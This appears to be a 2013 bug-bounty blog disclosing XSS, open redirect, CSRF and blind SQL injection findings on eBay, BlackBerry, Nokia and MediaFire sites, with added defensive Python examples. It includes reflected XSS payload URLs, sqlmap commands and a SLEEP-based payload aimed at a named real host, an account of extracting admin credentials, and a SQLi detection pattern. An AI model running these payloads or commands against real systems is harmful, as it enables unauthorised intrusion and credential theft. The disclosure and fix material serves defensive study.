Tuesday, June 4, 2013

XSS in Ebay Labs

I got 2 non-persistent XSS bugs in the eBay Labs website. Below are the details:

URL: http://labs.ebay.com

Alert Box:

1st one- http://labs.ebay.com/erl/demoto/to-add=lp&origtitle=Mr.&qy=%27%20onmouseover%3dprompt%281337%29%20bad%3d%27&skipk=20&sq=pop&title=Mr.

2nd one- http://labs.ebay.com/publications/-wpa-paged=2&wpa-sort=%22%20onmouseover%3dprompt%281337%29%20bad%3d%22

Attack Details: URL-encoded GET input qy was set to ' onmouseover=prompt(1337) bad='

The input is reflected inside a tag parameter between single quotes.

Affected items: /erl/demoto/to & /publications/

The impact of this vulnerability: Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.

How to fix this vulnerability: Your script should filter or encode metacharacters in user input before writing it back into the page.

This bug is reported to ebay and resolved now.

BlackBerry Multiple Bugs


I found 3 bugs in the BlackBerry mobile site, m.blackberry.com, and 2 bugs in the developer site, developer.blackberry.com.

Tested on: Windows 7, Google Chrome & Firefox (latest versions)

1. URL redirection is sometimes used as part of phishing attacks that confuse visitors about which web site they are visiting, or trick them into downloading malicious files.

A remote attacker can redirect users from your website to a URL of their choosing. This problem may assist phishing attacks, trojan distribution and spam.

=> Vulnerable URL: http://m.blackberry.com/cps/rde/xchg/blackberrymobile2012/hs.xsl/-/index.html?

The above URL redirects to apple.com, which can be replaced with a malicious phishing URL or a file containing malware.

Fix: Your script should properly sanitize user input
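One way to do that sanitising for a redirect parameter is an allow-list check on the target before it is placed in the Location header. The code below is an added example, not code from the BlackBerry site: the page does not show which parameter the site redirected on, so the allowed host names, the fallback path and the response shape are constructed assumptions.

```python
"""Allow-list validation for a redirect target (added example).

The allowed host list, the fallback path and the response shape are
constructed assumptions; the page does not show the redirect parameter.
"""
from urllib.parse import urlsplit

# Constructed allow-list: only the site's own hosts may be redirect targets.
ALLOWED_HOSTS = {"m.blackberry.com", "www.blackberry.com"}


def safe_redirect_target(target, allowed_hosts=ALLOWED_HOSTS, fallback="/"):
    """Return `target` if it is a same-origin relative path or an http(s)
    URL whose host is on the allow-list; otherwise return `fallback`."""
    if not target:
        return fallback
    target = target.strip()
    # CR/LF or NUL in the value would corrupt the Location header itself.
    if any(ch in target for ch in "\r\n\x00"):
        return fallback
    # A single leading "/" is a same-origin path.  "//host" is a
    # protocol-relative URL and browsers treat "/\host" the same way, so
    # both fall through to the URL parser instead of being accepted here.
    if target.startswith("/") and target[1:2] not in ("/", "\\"):
        return target
    parts = urlsplit(target)
    if parts.scheme.lower() not in ("http", "https"):
        return fallback
    # urlsplit strips any user@ prefix, so "https://good@evil/" yields "evil".
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        return fallback
    return target


def redirect_response(target):
    """Shape of the HTTP response a handler would send after validation."""
    return {"status": 302, "headers": {"Location": safe_redirect_target(target)}}


if __name__ == "__main__":
    for candidate in ("https://apple.com/", "//apple.com/", "/index.html",
                      "https://m.blackberry.com/index.html"):
        print(candidate, "->", safe_redirect_target(candidate))
```

The check deliberately compares the parsed host name rather than doing a prefix match on the raw string, because a prefix match is what `https://m.blackberry.com@apple.com/`-style values get past.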

2. Path disclosure
Type: Information Disclosure
URL: http://m.blackberry.com/cps/rde/xchg/blackberrymobile2012

The above URL is disclosing the path on the server: /cps/rde/xchg/SID-B461826F-730AD1C9/blackberrymobile2012

Fix: Deal with errors gracefully when a file is not in the location it should be.

3. Important HTML forms without CSRF protection:
/at/de/feedback.html
/at/de/polling1.html
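The usual fix for those forms is a per-session anti-CSRF token that the server issues with the form and checks on submit. Below is an added example of such a token (HMAC over the session id and an issue time), not code from BlackBerry's site; the server secret, the session identifier and the feedback handler are constructed for illustration.

```python
"""Per-session CSRF token: issue with the form, verify on POST (added example).

The secret, session ids and the form handler are constructed stand-ins.
"""
import hashlib
import hmac
import time

# Constructed secret; a real deployment loads this from protected config.
SERVER_SECRET = b"constructed-demo-secret"


def issue_token(session_id, issued_at=None):
    """Token = issue time + HMAC(secret, session_id:issue_time).
    Embedding the session id binds the token to one logged-in session."""
    ts = int(time.time()) if issued_at is None else int(issued_at)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{ts}".encode(), hashlib.sha256).hexdigest()
    return f"{ts}.{mac}"


def verify_token(session_id, token, now=None, max_age=3600):
    """True only if the token was minted for this session, has not expired,
    and its MAC matches (constant-time compare)."""
    now = int(time.time()) if now is None else int(now)
    try:
        ts_str, mac = token.split(".", 1)
        ts = int(ts_str)
    except (AttributeError, ValueError):
        return False
    if ts > now or now - ts > max_age:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{ts}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def handle_feedback_post(session_id, form, now=None):
    """Server-side check a handler for a form like /at/de/feedback.html
    would run before acting on the submission.  Returns (status, message)."""
    if not verify_token(session_id, form.get("csrf_token", ""), now):
        return 403, "CSRF token missing or invalid"
    return 200, "feedback accepted"


if __name__ == "__main__":
    sid = "session-A"
    tok = issue_token(sid)
    print(handle_feedback_post(sid, {"csrf_token": tok, "message": "hello"}))
    print(handle_feedback_post(sid, {"message": "hello"}))
```

A cross-site form post cannot carry a valid token because the attacker's page never sees the victim's session-bound value, so the handler rejects it before touching any data.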

I reported this to BlackBerry PSIRT already & the bugs are patched by now.

The 2 bugs in the developer site were use of the deprecated SSL 2.0 protocol & weak SSL ciphers, which are not very critical.

Non-persistent XSS in Nokia Subdomain

I found 2 non-persistent XSS bugs in one Nokia subdomain; please see the details below.

Subdomain: https://www.sales.nokia.com

Vulnerability type: XSS

Affected Items:


Vulnerable URLs:

1. https://www.sales.nokia.com/mis/loginSubmit.do?CALLING_PAGE=&txtPasswd=&txtUsrName="</script>'<SCRIPT>alert("XSS")</SCRIPT>

2. https://www.sales.nokia.com/mis/forgotPwdSubmit.do?txtEmailID=&txtUserID=%22%3C/script%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C/SCRIPT%3E

Though it was not that easy to find this XSS, as it was a login page that used POST requests to authenticate and there was JavaScript blocking the use of any special characters. So I used the Firefox add-on to tamper with the request, putting admin@nokia.com as the email and 12345 as the password, then tampering the admin@nokia with a normal payload; it still didn't execute, then I checked the source of the page and noticed there was a " and an open <script> tag, so I modified the payload and it executed successfully.

Tested On- Windows 7 and Firefox Latest Version

I then finally reported it to Nokia.
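Both XSS write-ups on this page come down to the same fix: encode the reflected value for the context it lands in. The eBay qy value was reflected inside a quoted tag attribute; the Nokia txtUsrName value was reflected inside an open " string in a <script> block. The code below is an added example, not code from either site: the page templates are constructed, the two sample inputs copy the shape of the payloads quoted above, and the small parser at the end is only there to show what a browser-like parser sees in the vulnerable versus the hardened output.

```python
"""Context-aware output encoding for reflected input (added example).

Models the two reflection contexts from the write-ups: a value written into
a quoted HTML attribute (the eBay ``qy`` parameter) and a value written into
a JavaScript string inside a <script> block (the Nokia ``txtUsrName``
parameter).  Templates and sample inputs are constructed.
"""
import html
import json
from html.parser import HTMLParser

ATTR_INPUT = "' onmouseover=prompt(1337) bad='"            # constructed, eBay shape
SCRIPT_INPUT = '"</script>\'<SCRIPT>alert("XSS")</SCRIPT>'  # constructed, Nokia shape


def render_attr_unsafe(value):
    """Vulnerable: raw input inside a single-quoted attribute."""
    return "<input name='qy' value='" + value + "'>"


def render_attr_safe(value):
    """Hardened: HTML-encode first; quote=True also encodes ' and "."""
    return "<input name='qy' value='" + html.escape(value, quote=True) + "'>"


def render_script_unsafe(value):
    """Vulnerable: raw input inside a JavaScript string literal."""
    return '<script>var user = "' + value + '";</script>'


def render_script_safe(value):
    """Hardened: JSON-encode for the JS string context, then escape "/" so a
    literal </script> inside the data cannot end the script block early."""
    return "<script>var user = " + json.dumps(value).replace("/", "\\/") + ";</script>"


class _Inspector(HTMLParser):
    """Records what a browser-like parser would see in the rendered markup."""

    def __init__(self):
        super().__init__()
        self.input_attrs = []   # attribute names found on the <input> tag
        self.script_tags = 0    # number of <script> start tags

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        if tag == "input":
            self.input_attrs.extend(name for name, _ in attrs)


def inspect_markup(rendered):
    """Return (attribute names on the <input>, number of <script> start tags)."""
    parser = _Inspector()
    parser.feed(rendered)
    parser.close()
    return parser.input_attrs, parser.script_tags


if __name__ == "__main__":
    print(render_attr_unsafe(ATTR_INPUT), inspect_markup(render_attr_unsafe(ATTR_INPUT)))
    print(render_attr_safe(ATTR_INPUT), inspect_markup(render_attr_safe(ATTR_INPUT)))
    print(render_script_unsafe(SCRIPT_INPUT), inspect_markup(render_script_unsafe(SCRIPT_INPUT)))
    print(render_script_safe(SCRIPT_INPUT), inspect_markup(render_script_safe(SCRIPT_INPUT)))
```

In the vulnerable attribute rendering the parser reports an extra onmouseover attribute on the input; in the hardened one it reports only name and value, because the quote that would have closed the attribute is now an entity. In the vulnerable script rendering the parser sees two script elements; the hardened one keeps everything inside a single string literal. The point is that the encoding depends on the context, which is why a single input filter applied at request time tends to miss one of the two cases.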


Mediafire Blind SQL Injection

I found a critical blind SQLi bug in the MediaFire knowledgebase, which could be used to break into MediaFire servers. Please see below for details.

#Software Type: PHPKB Knowledge Base Software v7

#Tool Used: sqlmap on ubuntu

#Tested on: Ubuntu & Windows (Chrome & firefox)

#Commands used in SQL Map:

1>>   ./sqlmap.py -u "http://knowledgebase.mediafire.com/article.php?id=72" --dbs

2>>   ./sqlmap.py -u "http://knowledgebase.mediafire.com/article.php?id=72" -D knowledgebase --tables

Type: PHPKB Knowledge Base Software

Blind SQL Injection

Place: GET
Parameter: id

Type: AND/OR time-based blind
Title: Mysql > 5.0.11 AND time-based blind
Payload: id=72 AND SLEEP(5)


available databases [3]:

[*] information_schema
[*] knowledgebase
[*] test

Database: knowledgebase
[27 tables]
| phpkb_article_collaboration
| phpkb_article_versions      
| phpkb_article_visits        
| phpkb_articles              
| phpkb_attachments          
| phpkb_authors              
| phpkb_autosave              
| phpkb_categories            
| phpkb_comments              
| phpkb_custom_data          
| phpkb_custom_fields        
| phpkb_favorites            
| phpkb_glossary              
| phpkb_groups                
| phpkb_groups_categories    
| phpkb_groups_relations      
| phpkb_languages            
| phpkb_login_attempts        
| phpkb_news                  
| phpkb_ratings              
| phpkb_referrers            
| phpkb_relations            
| phpkb_saved_searches        
| phpkb_subscribers          
| phpkb_templates            
| phpkb_tickets              
| phpkb_translation_assignments

While digging through their tables I found the admin details in the table _authors; it was getting a bit harder as sqlmap was not able to extract the column names completely. So I made a guess, and it was author_username & author_password. So I found the below details-


While testing the algorithm of the hash I found that it was MD5 or Domain Cached Credentials.
But I couldn't crack it; it was taking a hell of a lot of time.

So this was all; when I reported it to MediaFire's VP they said it's a duplicate. And hence I made it public.
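For completeness, here is what the fix on the application side looks like for an article.php?id= lookup, together with a check for the probe pattern sqlmap reported. This is an added example, not PHPKB's code (PHPKB is PHP and its real schema is not on the page), so it runs against a constructed in-memory SQLite table named after the page's phpkb_articles. SQLite has no SLEEP(), so the vulnerable handler is exercised with the boolean-blind form of the same probe; the log-line check at the end flags both the time-based and the boolean forms.

```python
"""Parameterised lookup for article.php?id= plus a query-string probe check.

Added example, not PHPKB's code.  The table and its rows are constructed.
"""
import re
import sqlite3
from urllib.parse import unquote_plus


def demo_db():
    """Constructed stand-in for the knowledgebase database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE phpkb_articles (article_id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO phpkb_articles VALUES (?, ?)",
        [(71, "Constructed article 71"), (72, "Constructed article 72"), (73, "Constructed article 73")],
    )
    return conn


def lookup_article_unsafe(conn, id_param):
    """Vulnerable: the query-string value is concatenated into the SQL, so
    the WHERE clause evaluates whatever the client appended to the id."""
    row = conn.execute("SELECT title FROM phpkb_articles WHERE article_id = " + id_param).fetchone()
    return row[0] if row else None


def lookup_article_safe(conn, id_param):
    """Hardened: validate the shape first, then bind the value as a
    parameter so the database only ever compares it as data."""
    if not re.fullmatch(r"[1-9][0-9]{0,8}", id_param):
        raise ValueError("id must be a positive integer")
    row = conn.execute(
        "SELECT title FROM phpkb_articles WHERE article_id = ?", (int(id_param),)
    ).fetchone()
    return row[0] if row else None


def handle_article_request(conn, id_param):
    """HTTP-style wrapper around the hardened lookup: (status, body)."""
    try:
        title = lookup_article_safe(conn, id_param)
    except ValueError as exc:
        return 400, str(exc)
    if title is None:
        return 404, "no such article"
    return 200, title


# Shapes seen in the sqlmap output above, for flagging request query strings
# in access logs: time-based functions and the AND/OR number=number form.
PROBE_RE = re.compile(r"\b(?:sleep|benchmark)\s*\(|\b(?:and|or)\s+\d+\s*=\s*\d+", re.IGNORECASE)


def looks_like_sqli_probe(query_string):
    """True if a URL-decoded query string carries one of the probe shapes."""
    return PROBE_RE.search(unquote_plus(query_string)) is not None


if __name__ == "__main__":
    db = demo_db()
    for param in ("72", "72 AND 1=1", "72 AND 1=0"):
        print(repr(param), "unsafe ->", lookup_article_unsafe(db, param),
              "| safe ->", handle_article_request(db, param))
    print(looks_like_sqli_probe("id=72%20AND%20SLEEP(5)"))
```

With the concatenated query, "72 AND 1=1" and "72 AND 1=0" return different results, which is exactly the oracle a blind injection needs; with the bound parameter the same strings are rejected before reaching the database, and even a value that slipped through could only be compared as a number. The probe check is a cheap first-pass detector for web logs rather than a substitute for the fix.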